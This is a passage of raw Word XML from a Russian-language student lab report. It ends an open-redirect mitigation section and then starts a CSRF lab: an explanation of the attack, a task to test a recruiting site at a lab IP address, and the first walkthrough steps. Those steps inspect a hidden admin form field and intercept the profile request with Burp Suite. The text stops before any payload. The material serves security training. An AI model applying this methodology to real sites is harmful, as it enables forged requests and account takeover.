    <w:p w14:paraId="1DC22251" w14:textId="20D7BF07" w:rsidR="00EF445B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Если это невозможно, вы можете попробовать следующие подходы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA7F19" w14:textId="77777777" w:rsidR="001C1E0A" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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>Используйте список фиксированных целевых страниц. Храните их полные </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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URL</w:t>
      </w:r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>-адреса в таблице базы данных и вызывайте их, используя идентификаторы в качестве параметров запроса, а не сами </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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URL</w:t>
      </w:r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-адреса. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAB456F" w14:textId="2903AB97" w:rsidR="00EF445B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="001C1E0A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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>Например, сохраните </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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http://example2.com</w:t>
      </w:r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> в таблице базы данных с идентификатором 42, а затем используйте следующий вызов для перенаправления на example2.com:</w:t>
      </w:r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B3AE2">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://example.com/redirect.php?redir_id=42</w:t>
      </w:r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937C28" w14:textId="7E97B4BB" w:rsidR="00EF445B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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>Если вы не можете использовать фиксированный список целей перенаправления, отфильтруйте ненадежный ввод (если можете, используйте белый список, а не ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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ё</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>рный</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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список).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190ED34A" w14:textId="77777777" w:rsidR="00EF445B" w:rsidRPr="006B3AE2" w:rsidRDefault="00EF445B" w:rsidP="00EF445B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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>Обязательно проверьте наличие неполных строк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2A36D" w14:textId="51681418" w:rsidR="008E07B4" w:rsidRPr="006B3AE2" w:rsidRDefault="001C1E0A" w:rsidP="008E07B4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5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3AE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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF445B"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>апретите</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF445B"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все протоколы, кроме </w:t>
      </w:r>
      <w:r w:rsidR="00EF445B" w:rsidRPr="006B3AE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HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00EF445B"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> и </w:t>
      </w:r>
      <w:r w:rsidR="00EF445B" w:rsidRPr="006B3AE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HTTPS</w:t>
      </w:r>
      <w:r w:rsidR="00EF445B"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5CCE3472" w14:textId="77777777" w:rsidR="008E07B4" w:rsidRPr="006B3AE2" w:rsidRDefault="008E07B4" w:rsidP="008E07B4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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514083" w14:textId="5D714B09" w:rsidR="00BE544A" w:rsidRPr="006B3AE2" w:rsidRDefault="00BE544A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E588A3C" w14:textId="05BC0434" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18FA01A8" w14:textId="4A1E3770" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0441A061" w14:textId="64B250CC" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561FAEF1" w14:textId="32F1DAA5" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA" w:rsidP="008179BA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336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B3AE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Лабораторная работа </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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№ </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>14.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188732F0" w14:textId="7F9E2383" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="008179BA" w:rsidP="008179BA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="474747"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C54DED" w14:textId="77777777" w:rsidR="00B92B4E" w:rsidRPr="006B3AE2" w:rsidRDefault="00B92B4E" w:rsidP="00B92B4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150FDB97" w14:textId="77777777" w:rsidR="00B92B4E" w:rsidRPr="006B3AE2" w:rsidRDefault="00B92B4E" w:rsidP="00B92B4E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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Межсайтовая подделка запросов</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t> (также известная как </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это уязвимость, которая позволяет злоумышленнику побудить пользователей выполнить действия, которые они не собираются выполнять. Это позволяет злоумышленнику частично обойти </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same origin policy</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, которая предназначена для предотвращения взаимодействия различных веб-сайтов друг с другом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67F2C5" w14:textId="42200805" w:rsidR="00B92B4E" w:rsidRPr="006B3AE2" w:rsidRDefault="00B92B4E" w:rsidP="00B92B4E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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>В успешной CSRF-атаке злоумышленник заставляет пользователя-жертву непреднамеренно выполнить действие. Например, это может быть изменение адреса электронной почты в учётной записи, изменение пароля или перевод средств. В зависимости от характера действия злоумышленник может получить полный контроль над учётной записью пользователя. Если скомпрометированный пользователь имеет привилегированную роль в приложении, злоумышленник может получить полный контроль над всеми данными и функциями приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B313EA" w14:textId="77777777" w:rsidR="00B92B4E" w:rsidRPr="006B3AE2" w:rsidRDefault="00B92B4E" w:rsidP="008179BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D31262" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A752F2A" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1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</w:p>
    <w:p w14:paraId="3D125EF6" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1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  <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Мы создали сайт для поиска кандидатов в команду и проверяем его в постоянном режиме администратором. Проверьте, насколько безопасен наш подход по поиску кандидатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1E77A" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1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B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Сайт: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="006B3AE2">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="000000" w:themeColor="text1"/>
          </w:rPr>
          <w:t>http://51.250.73.193:5002</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815CFD4" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind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Общая информация:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2EB7B" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A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B3A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A0A400" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Период тестирования: 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20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12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2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC0776F" w14:textId="501ED2FE" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A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3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объект тестирования: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://51.250.73.193:5002/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B29239" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A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31A077B0" w14:textId="77777777" w:rsidR="000624A1" w:rsidRPr="006B3AE2" w:rsidRDefault="000624A1" w:rsidP="000624A1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind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Описание действий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решение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F161CDD" w14:textId="69A9DF94" w:rsidR="008179BA" w:rsidRPr="006B3AE2" w:rsidRDefault="00EC2D24" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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Для решения лабораторной работы мы должны отправить определённый запрос с определённым параметром. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F317CB" w14:textId="09DD8D2C" w:rsidR="00E479EB" w:rsidRPr="006B3AE2" w:rsidRDefault="00E479EB" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>На главной странице сайта регистрируем нового пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D76E7" w14:textId="566899A8" w:rsidR="00E479EB" w:rsidRPr="006B3AE2" w:rsidRDefault="00E479EB" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Проверим какая информация есть на страницах в меню</w:t>
      </w:r>
      <w:r w:rsidR="00444114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(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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3BAB377" w14:textId="2A419DEC" w:rsidR="009B3D1E" w:rsidRPr="006B3AE2" w:rsidRDefault="009B3D1E" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Страница “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>” позволяет менять профиль</w:t>
      </w:r>
      <w:r w:rsidR="005F03CD" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, отправляет какой-то запрос на сервер</w:t>
      </w:r>
      <w:r w:rsidR="00444114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(2)</w:t>
      </w:r>
      <w:r w:rsidR="005F03CD" w:rsidRPr="006B3AE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F755E6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Нажимаем “</w:t>
      </w:r>
      <w:r w:rsidR="00F755E6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Edit</w:t>
      </w:r>
      <w:r w:rsidR="00F755E6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755E6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r w:rsidR="00F755E6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>” попадаем на страницу</w:t>
      </w:r>
      <w:r w:rsidR="00C6447B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(3)</w:t>
      </w:r>
      <w:r w:rsidR="00F755E6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, где посмотрим её </w:t>
      </w:r>
      <w:r w:rsidR="000B5B6A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исходный </w:t>
      </w:r>
      <w:r w:rsidR="00F755E6" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidR="00444114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C6447B" w:rsidRPr="006B3AE2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444114" w:rsidRPr="006B3AE2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F755E6" w:rsidRPr="006B3AE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442BD8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Просмотрев код, нас будут </w:t>
      </w:r>
      <w:r w:rsidR="00085968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больше </w:t>
      </w:r>
      <w:r w:rsidR="00442BD8" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>интересовать формы “</w:t>
      </w:r>
      <w:r w:rsidR="00442BD8" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidR="00085968" w:rsidRPr="006B3AE2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442BD8" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidR="00442BD8" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00F40056" w:rsidRPr="006B3AE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A9CD8C7" w14:textId="2E761FDE" w:rsidR="00F40056" w:rsidRPr="006B3AE2" w:rsidRDefault="00F40056" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Видим имя, с которым мы регистрировались: “</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Mike</w:t>
      </w:r>
      <w:r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”, также видим </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>checkbox</w:t>
      </w:r>
      <w:r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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00E861B0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, данный параметр как-то связан с </w:t>
      </w:r>
      <w:r w:rsidR="00E861B0" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00522491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– это даёт подсказку, что данную форму мы должны эксплуатировать. Остальные параметры также пригодятся для формирования запроса</w:t>
      </w:r>
      <w:r w:rsidR="001D5B69" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, например, кнопка со значением “</w:t>
      </w:r>
      <w:r w:rsidR="001D5B69" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>APPLY</w:t>
      </w:r>
      <w:r w:rsidR="001D5B69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D5B69" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>CHANGES</w:t>
      </w:r>
      <w:r w:rsidR="001D5B69" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004B5FB2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="004B5FB2" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>textarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B5FB2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B5FB2" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="004B5FB2" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>=“</w:t>
      </w:r>
      <w:r w:rsidR="004B5FB2" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidR="004B5FB2" w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B16038" w14:textId="7E1AD1EF" w:rsidR="0056696C" w:rsidRPr="006B3AE2" w:rsidRDefault="0056696C" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Посмотрим суть запроса, который мы отправляем</w:t>
      </w:r>
      <w:r w:rsidR="00EF7864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и увидим какой метод используется, и как он называется, какие есть дополнительные параметры для формирования корректного запроса</w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE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5F4ABAB" w14:textId="292E92C4" w:rsidR="002C563C" w:rsidRPr="006B3AE2" w:rsidRDefault="002C563C" w:rsidP="00EC2D24">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing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Включаем перехват в программе </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r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B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r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пишем в поле страницы </w:t>
      </w:r>
      <w:r w:rsidRPr="006B3AE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Profile</w:t>
      </w:r>
      <w:r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сайта текст, а лучше обёрнутый в тег</w:t>
